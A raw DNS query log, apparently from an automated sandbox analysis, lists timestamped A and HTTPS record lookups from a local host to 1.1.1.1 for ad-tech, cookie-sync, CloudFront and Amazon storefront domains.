                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:13.451519012 CEST192.168.2.41.1.1.10x1eecStandard query (0)pixel.rubiconproject.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:13.451745987 CEST192.168.2.41.1.1.10xfd4Standard query (0)pixel.rubiconproject.com65IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:13.622632980 CEST192.168.2.41.1.1.10x633cStandard query (0)rtb-csync.smartadserver.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:13.622764111 CEST192.168.2.41.1.1.10x6f70Standard query (0)rtb-csync.smartadserver.com65IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:13.624933004 CEST192.168.2.41.1.1.10x9e65Standard query (0)public-prod-dspcookiematching.dmxleo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:13.625072956 CEST192.168.2.41.1.1.10x6deStandard query (0)public-prod-dspcookiematching.dmxleo.com65IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:13.695409060 CEST192.168.2.41.1.1.10xef0fStandard query (0)dpm.demdex.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:13.695569992 CEST192.168.2.41.1.1.10x87d4Standard query (0)dpm.demdex.net65IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:13.840013027 CEST192.168.2.41.1.1.10xd59fStandard query (0)odr.mookie1.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:13.840147018 CEST192.168.2.41.1.1.10xd07eStandard query (0)odr.mookie1.com65IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:13.854787111 CEST192.168.2.41.1.1.10xb576Standard query (0)c1.adform.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:13.854933977 CEST192.168.2.41.1.1.10x6884Standard query (0)c1.adform.net65IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:13.871052027 CEST192.168.2.41.1.1.10xa9c5Standard query (0)sync.rfp.fout.jpA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:13.871201038 CEST192.168.2.41.1.1.10xabfStandard query (0)sync.rfp.fout.jp65IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:13.874164104 CEST192.168.2.41.1.1.10x399Standard query (0)s.amazon-adsystem.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:13.874428988 CEST192.168.2.41.1.1.10xce6eStandard query (0)s.amazon-adsystem.com65IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:13.949712992 CEST192.168.2.41.1.1.10x1c2bStandard query (0)aax-eu.amazon-adsystem.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:13.949858904 CEST192.168.2.41.1.1.10xd592Standard query (0)aax-eu.amazon-adsystem.com65IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:13.954740047 CEST192.168.2.41.1.1.10xbfadStandard query (0)a1d260d3e4810dfad67eec02571e86f4b.profile.akl50-c2.cloudfront.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:13.954874039 CEST192.168.2.41.1.1.10x8a4bStandard query (0)a1d260d3e4810dfad67eec02571e86f4b.profile.akl50-c2.cloudfront.net65IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:14.142085075 CEST192.168.2.41.1.1.10x9f2dStandard query (0)bs.serving-sys.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:14.142215967 CEST192.168.2.41.1.1.10x73eStandard query (0)bs.serving-sys.com65IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:14.267045975 CEST192.168.2.41.1.1.10x7dafStandard query (0)cookie-matching.mediarithmics.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:14.267258883 CEST192.168.2.41.1.1.10x5120Standard query (0)cookie-matching.mediarithmics.com65IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:14.294084072 CEST192.168.2.41.1.1.10x1f7Standard query (0)cm.g.doubleclick.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:14.294260979 CEST192.168.2.41.1.1.10x1325Standard query (0)cm.g.doubleclick.net65IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:14.555047989 CEST192.168.2.41.1.1.10x271dStandard query (0)usermatch.krxd.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:14.555265903 CEST192.168.2.41.1.1.10x85c4Standard query (0)usermatch.krxd.net65IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:14.563093901 CEST192.168.2.41.1.1.10x295dStandard query (0)usermatch.krxd.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:14.567481995 CEST192.168.2.41.1.1.10xe55dStandard query (0)odr.mookie1.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:14.567651987 CEST192.168.2.41.1.1.10xa006Standard query (0)odr.mookie1.com65IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:14.573582888 CEST192.168.2.41.1.1.10x4df6Standard query (0)csync.loopme.meA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:14.573717117 CEST192.168.2.41.1.1.10x7233Standard query (0)csync.loopme.me65IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:14.794791937 CEST192.168.2.41.1.1.10x754fStandard query (0)us-u.openx.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:14.794939041 CEST192.168.2.41.1.1.10xeb5bStandard query (0)us-u.openx.net65IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:14.974407911 CEST192.168.2.41.1.1.10xac12Standard query (0)ssum-sec.casalemedia.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:14.974714041 CEST192.168.2.41.1.1.10x157dStandard query (0)ssum-sec.casalemedia.com65IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:15.302267075 CEST192.168.2.41.1.1.10x2599Standard query (0)lm.serving-sys.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:15.302411079 CEST192.168.2.41.1.1.10x965aStandard query (0)lm.serving-sys.com65IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:15.515450001 CEST192.168.2.41.1.1.10x51bcStandard query (0)eb2.3lift.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:15.515603065 CEST192.168.2.41.1.1.10x91dStandard query (0)eb2.3lift.com65IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:15.517709970 CEST192.168.2.41.1.1.10x3242Standard query (0)uipglob.semasio.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:15.517854929 CEST192.168.2.41.1.1.10x5100Standard query (0)uipglob.semasio.net65IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:16.033752918 CEST192.168.2.41.1.1.10x8a67Standard query (0)unagi-na.amazon.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:16.034069061 CEST192.168.2.41.1.1.10x8d8fStandard query (0)unagi-na.amazon.com65IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:16.396697998 CEST192.168.2.41.1.1.10x4b9cStandard query (0)crb.kargo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:16.397608995 CEST192.168.2.41.1.1.10xb828Standard query (0)crb.kargo.com65IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:16.481215000 CEST192.168.2.41.1.1.10x8058Standard query (0)uipus.semasio.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:16.481374979 CEST192.168.2.41.1.1.10x298eStandard query (0)uipus.semasio.net65IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:16.507116079 CEST192.168.2.41.1.1.10xca85Standard query (0)usersync.gumgum.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:16.507385015 CEST192.168.2.41.1.1.10xebbfStandard query (0)usersync.gumgum.com65IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:16.921818972 CEST192.168.2.41.1.1.10x2526Standard query (0)image2.pubmatic.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:16.922053099 CEST192.168.2.41.1.1.10x62eStandard query (0)image2.pubmatic.com65IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:16.964848995 CEST192.168.2.41.1.1.10x414cStandard query (0)token.rubiconproject.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:16.965095043 CEST192.168.2.41.1.1.10xb08Standard query (0)token.rubiconproject.com65IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:17.338249922 CEST192.168.2.41.1.1.10x926Standard query (0)loadus.exelator.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:17.338397026 CEST192.168.2.41.1.1.10x8b70Standard query (0)loadus.exelator.com65IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:17.516099930 CEST192.168.2.41.1.1.10xf648Standard query (0)www.facebook.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:17.516377926 CEST192.168.2.41.1.1.10x7db2Standard query (0)www.facebook.com65IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:17.519337893 CEST192.168.2.41.1.1.10xcfd1Standard query (0)crb.kargo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:17.519465923 CEST192.168.2.41.1.1.10x8c55Standard query (0)crb.kargo.com65IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:17.988518953 CEST192.168.2.41.1.1.10x57adStandard query (0)sync-amazon.ads.yieldmo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:17.988636971 CEST192.168.2.41.1.1.10xffb1Standard query (0)sync-amazon.ads.yieldmo.com65IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:18.218642950 CEST192.168.2.41.1.1.10x8498Standard query (0)a.nel.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:18.218810081 CEST192.168.2.41.1.1.10x6e90Standard query (0)a.nel.cloudflare.com65IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:18.219077110 CEST192.168.2.41.1.1.10x8179Standard query (0)a.nel.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:18.219211102 CEST192.168.2.41.1.1.10xac37Standard query (0)a.nel.cloudflare.com65IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:18.417228937 CEST192.168.2.41.1.1.10x6aa2Standard query (0)sync.sxp.smartclip.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:18.417366028 CEST192.168.2.41.1.1.10x94a4Standard query (0)sync.sxp.smartclip.net65IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:18.418144941 CEST192.168.2.41.1.1.10x6ab1Standard query (0)image6.pubmatic.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:18.418276072 CEST192.168.2.41.1.1.10x4ac6Standard query (0)image6.pubmatic.com65IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:24.136745930 CEST192.168.2.41.1.1.10xd9b1Standard query (0)www.amazon.aeA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:24.136910915 CEST192.168.2.41.1.1.10xbbe6Standard query (0)www.amazon.ae65IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:25.161071062 CEST192.168.2.41.1.1.10x6f54Standard query (0)images-eu.ssl-images-amazon.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:25.161254883 CEST192.168.2.41.1.1.10x4416Standard query (0)images-eu.ssl-images-amazon.com65IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:25.161765099 CEST192.168.2.41.1.1.10x59cbStandard query (0)m.media-amazon.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:25.161916971 CEST192.168.2.41.1.1.10xe0b8Standard query (0)m.media-amazon.com65IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:25.162599087 CEST192.168.2.41.1.1.10xa99fStandard query (0)completion.amazon.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:25.162832022 CEST192.168.2.41.1.1.10x9fe2Standard query (0)completion.amazon.com65IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:25.706940889 CEST192.168.2.41.1.1.10xd4c3Standard query (0)m.media-amazon.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:25.707093954 CEST192.168.2.41.1.1.10xe871Standard query (0)m.media-amazon.com65IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:26.032641888 CEST192.168.2.41.1.1.10x7b25Standard query (0)amazon.partners.tremorhub.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:26.032802105 CEST192.168.2.41.1.1.10x784bStandard query (0)amazon.partners.tremorhub.com65IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:26.044059992 CEST192.168.2.41.1.1.10x199cStandard query (0)amazon.partners.tremorhub.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:28.160775900 CEST192.168.2.41.1.1.10x4c8eStandard query (0)images-eu.ssl-images-amazon.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:28.160901070 CEST192.168.2.41.1.1.10xbe46Standard query (0)images-eu.ssl-images-amazon.com65IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:29.472289085 CEST192.168.2.41.1.1.10xf07fStandard query (0)www.amazon.aeA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:29.472419977 CEST192.168.2.41.1.1.10x12adStandard query (0)www.amazon.ae65IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:29.603812933 CEST192.168.2.41.1.1.10x3dcdStandard query (0)static.siege-amazon.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:29.603961945 CEST192.168.2.41.1.1.10x3218Standard query (0)static.siege-amazon.com65IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:29.997169971 CEST192.168.2.41.1.1.10x305bStandard query (0)fls-eu.amazon.aeA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:29.997339964 CEST192.168.2.41.1.1.10x269fStandard query (0)fls-eu.amazon.ae65IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:30.112334013 CEST192.168.2.41.1.1.10x673dStandard query (0)amazon.partners.tremorhub.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:30.112514019 CEST192.168.2.41.1.1.10x25bdStandard query (0)amazon.partners.tremorhub.com65IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:30.137697935 CEST192.168.2.41.1.1.10xac3aStandard query (0)abcfb99af32569473cc2f16a61840d687.profile.hyd57-p6.cloudfront.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:30.137846947 CEST192.168.2.41.1.1.10x7875Standard query (0)abcfb99af32569473cc2f16a61840d687.profile.hyd57-p6.cloudfront.net65IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:30.633053064 CEST192.168.2.41.1.1.10xae89Standard query (0)static.siege-amazon.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:30.633194923 CEST192.168.2.41.1.1.10x189cStandard query (0)static.siege-amazon.com65IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:31.622328997 CEST192.168.2.41.1.1.10xa275Standard query (0)fls-eu.amazon.aeA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:31.622462988 CEST192.168.2.41.1.1.10x9c90Standard query (0)fls-eu.amazon.ae65IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:31.955908060 CEST192.168.2.41.1.1.10x576aStandard query (0)abcfb99af32569473cc2f16a61840d687.profile.hyd57-p6.cloudfront.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:31.956062078 CEST192.168.2.41.1.1.10xdaadStandard query (0)abcfb99af32569473cc2f16a61840d687.profile.hyd57-p6.cloudfront.net65IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:32.007956028 CEST192.168.2.41.1.1.10x2fe0Standard query (0)unagi-eu.amazon.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:32.008085966 CEST192.168.2.41.1.1.10x65f1Standard query (0)unagi-eu.amazon.com65IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:33.122271061 CEST192.168.2.41.1.1.10xbc1cStandard query (0)www.amazon.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:33.122612953 CEST192.168.2.41.1.1.10xa85cStandard query (0)www.amazon.de65IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:33.385549068 CEST192.168.2.41.1.1.10xb726Standard query (0)fls-eu.amazon.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:33.385818005 CEST192.168.2.41.1.1.10x761Standard query (0)fls-eu.amazon.com65IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:34.465892076 CEST192.168.2.41.1.1.10x1742Standard query (0)fls-eu.amazon.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:34.466038942 CEST192.168.2.41.1.1.10x9dStandard query (0)fls-eu.amazon.com65IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:35.192188025 CEST192.168.2.41.1.1.10x81f9Standard query (0)www.amazon.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:35.192517996 CEST192.168.2.41.1.1.10x419cStandard query (0)www.amazon.de65IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:42.837316990 CEST192.168.2.41.1.1.10x9d5eStandard query (0)amazon.partners.tremorhub.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:43.025921106 CEST192.168.2.41.1.1.10x99c9Standard query (0)d1nruqhae353qc.cloudfront.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:43.026062012 CEST192.168.2.41.1.1.10xf66eStandard query (0)d1nruqhae353qc.cloudfront.net65IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:44.563633919 CEST192.168.2.41.1.1.10xdacdStandard query (0)d2h8zr0m6mus4x.cloudfront.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:44.563811064 CEST192.168.2.41.1.1.10xcd90Standard query (0)d2h8zr0m6mus4x.cloudfront.net65IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:44.595001936 CEST192.168.2.41.1.1.10x8d4aStandard query (0)d1nruqhae353qc.cloudfront.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:44.595146894 CEST192.168.2.41.1.1.10x5ee9Standard query (0)d1nruqhae353qc.cloudfront.net65IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:45.629653931 CEST192.168.2.41.1.1.10x1489Standard query (0)images-na.ssl-images-amazon.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:45.630002022 CEST192.168.2.41.1.1.10x829cStandard query (0)images-na.ssl-images-amazon.com65IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:45.659290075 CEST192.168.2.41.1.1.10x62d5Standard query (0)d2h8zr0m6mus4x.cloudfront.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:45.659414053 CEST192.168.2.41.1.1.10xe9eaStandard query (0)d2h8zr0m6mus4x.cloudfront.net65IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:46.778173923 CEST192.168.2.41.1.1.10xff15Standard query (0)images-na.ssl-images-amazon.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:46.778304100 CEST192.168.2.41.1.1.10xd201Standard query (0)images-na.ssl-images-amazon.com65IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:50.573229074 CEST192.168.2.41.1.1.10xa7bdStandard query (0)completion.amazon.aeA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:50.573371887 CEST192.168.2.41.1.1.10x525Standard query (0)completion.amazon.ae65IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:51.200890064 CEST192.168.2.41.1.1.10x124Standard query (0)amazon.partners.tremorhub.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:51.201136112 CEST192.168.2.41.1.1.10x77d4Standard query (0)amazon.partners.tremorhub.com65IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:51.213726044 CEST192.168.2.41.1.1.10x5cb0Standard query (0)amazon.partners.tremorhub.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:52.945910931 CEST192.168.2.41.1.1.10x1f3cStandard query (0)unagi.amazon.aeA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:52.946063995 CEST192.168.2.41.1.1.10x296dStandard query (0)unagi.amazon.ae65IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:53.364855051 CEST192.168.2.41.1.1.10x21b3Standard query (0)amazon.partners.tremorhub.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:53.365009069 CEST192.168.2.41.1.1.10xc2e3Standard query (0)amazon.partners.tremorhub.com65IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:54.858016968 CEST192.168.2.41.1.1.10xa8bfStandard query (0)unagi.amazon.aeA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:54.858165979 CEST192.168.2.41.1.1.10x459dStandard query (0)unagi.amazon.ae65IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:55.657121897 CEST192.168.2.41.1.1.10x8edbStandard query (0)a8265b8647714b88e2cd01354cc7d3d6b.profile.iah50-c1.cloudfront.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:55.657314062 CEST192.168.2.41.1.1.10x12b1Standard query (0)a8265b8647714b88e2cd01354cc7d3d6b.profile.iah50-c1.cloudfront.net65IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:58.028275013 CEST192.168.2.41.1.1.10xae4eStandard query (0)a8265b8647714b88e2cd01354cc7d3d6b.profile.iah50-c1.cloudfront.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:58.037542105 CEST192.168.2.41.1.1.10xd76Standard query (0)a8265b8647714b88e2cd01354cc7d3d6b.profile.iah50-c1.cloudfront.net65IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:25:20.804321051 CEST192.168.2.41.1.1.10xec90Standard query (0)aax-eu.amazon-adsystem.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:25:20.804517984 CEST192.168.2.41.1.1.10xb4abStandard query (0)aax-eu.amazon-adsystem.com65IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:25:22.960513115 CEST192.168.2.41.1.1.10x41ffStandard query (0)ads.stickyadstv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:25:22.960850000 CEST192.168.2.41.1.1.10x5afdStandard query (0)ads.stickyadstv.com65IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:25:22.969074011 CEST192.168.2.41.1.1.10x8cfStandard query (0)loadus.exelator.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:25:22.969633102 CEST192.168.2.41.1.1.10x515eStandard query (0)loadus.exelator.com65IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:25:22.970221996 CEST192.168.2.41.1.1.10x5540Standard query (0)usersync.gumgum.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:25:22.970614910 CEST192.168.2.41.1.1.10x68b1Standard query (0)usersync.gumgum.com65IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:25:22.971266985 CEST192.168.2.41.1.1.10x1356Standard query (0)capi.connatix.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:25:22.971730947 CEST192.168.2.41.1.1.10x4246Standard query (0)capi.connatix.com65IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:25:22.973295927 CEST192.168.2.41.1.1.10x5ee0Standard query (0)amazon.partners.tremorhub.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:25:22.973635912 CEST192.168.2.41.1.1.10xc504Standard query (0)amazon.partners.tremorhub.com65IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:25:22.988867044 CEST192.168.2.41.1.1.10x7cf7Standard query (0)amazon.partners.tremorhub.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:25:23.150486946 CEST192.168.2.41.1.1.10xd7b6Standard query (0)s.amazon-adsystem.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:25:23.150846004 CEST192.168.2.41.1.1.10x81d6Standard query (0)s.amazon-adsystem.com65IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:25:23.781533003 CEST192.168.2.41.1.1.10x9c3eStandard query (0)s.amazon-adsystem.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:25:23.781744957 CEST192.168.2.41.1.1.10x2ffStandard query (0)s.amazon-adsystem.com65IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:25:24.565084934 CEST192.168.2.41.1.1.10x9570Standard query (0)aax-eu.amazon-adsystem.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:25:24.565234900 CEST192.168.2.41.1.1.10x4e24Standard query (0)aax-eu.amazon-adsystem.com65IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:25:26.141556025 CEST192.168.2.41.1.1.10x93a1Standard query (0)www.amazon.aeA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:25:26.141701937 CEST192.168.2.41.1.1.10xcc1fStandard query (0)www.amazon.ae65IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:25:37.294750929 CEST192.168.2.41.1.1.10x2b33Standard query (0)fls-eu.amazon.aeA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:25:37.294954062 CEST192.168.2.41.1.1.10xf5b7Standard query (0)fls-eu.amazon.ae65IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:25:48.247267962 CEST192.168.2.41.1.1.10x6e27Standard query (0)www.amazon.aeA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:25:48.247453928 CEST192.168.2.41.1.1.10xa0f9Standard query (0)www.amazon.ae65IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:25:53.997282982 CEST192.168.2.41.1.1.10x6f12Standard query (0)unagi.amazon.aeA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:25:53.997529030 CEST192.168.2.41.1.1.10xfce2Standard query (0)unagi.amazon.ae65IN (0x0001)false
